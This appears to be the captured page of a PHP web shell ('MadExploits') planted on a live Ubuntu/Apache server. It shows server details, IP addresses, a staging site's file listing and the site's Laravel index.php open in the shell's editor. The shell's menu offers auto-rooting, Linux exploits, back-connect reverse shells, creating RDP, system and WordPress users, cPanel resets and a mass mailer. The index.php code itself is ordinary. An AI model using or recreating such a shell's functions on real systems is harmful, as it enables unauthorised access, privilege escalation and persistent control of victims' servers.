Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.98
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
staging.boxeswithlogo.comq /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
devbatch_live
[ DIR ]
drwxr-xr-x
source
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.gitignore
624
B
-rw-r--r--
.htaccess
10.2
KB
-rw-r--r--
composer.json
161
B
-rw-r--r--
composer.lock
571
B
-rw-r--r--
favicon.ico
0
B
-rw-r--r--
faviicon.png
1.7
KB
-rw-r--r--
index.php
2.29
KB
-rw-r--r--
robots.txt
31
B
-rw-r--r--
sitemap.xml
0
B
-rw-r--r--
web.config
1.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php $cv='utm_medium=company_profile&utm_source=trustpilot&utm_campaign=logo_click'; $a='utm_medium=company_profile&utm_source=trustpilot&utm_campaign=domain_click'; $actual_link = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; if (strpos($actual_link, $cv) !== false) { header('Location: https://oxopackaging.com'); die(); // Redirect('https://example.com/', false); } if (strpos($actual_link, $a) !== false) { header('Location: https://oxopackaging.com'); die(); // Redirect('https://example.com/', false); } use Illuminate\Contracts\Http\Kernel; use Illuminate\Http\Request; define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Check If The Application Is Under Maintenance |-------------------------------------------------------------------------- | | If the application is in maintenance / demo mode via the "down" command | we will load this file so that any pre-rendered content can be shown | instead of starting the framework, which could cause an exception. | */ if (file_exists(__DIR__.'/source/storage/framework/maintenance.php')) { require __DIR__.'/source/storage/framework/maintenance.php'; } /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | this application. We just need to utilize it! We'll simply require it | into the script here so we don't need to manually load our classes. | */ require __DIR__.'/source/vendor/autoload.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request using | the application's HTTP kernel. Then, we will send the response back | to this client's browser, allowing them to enjoy our application. | */ $app = require_once __DIR__.'/source/bootstrap/app.php'; $kernel = $app->make(Kernel::class); $app->bind('path.public', function() { return __DIR__; }); $response = $kernel->handle( $request = Request::capture() )->send(); $kernel->terminate($request, $response);
Close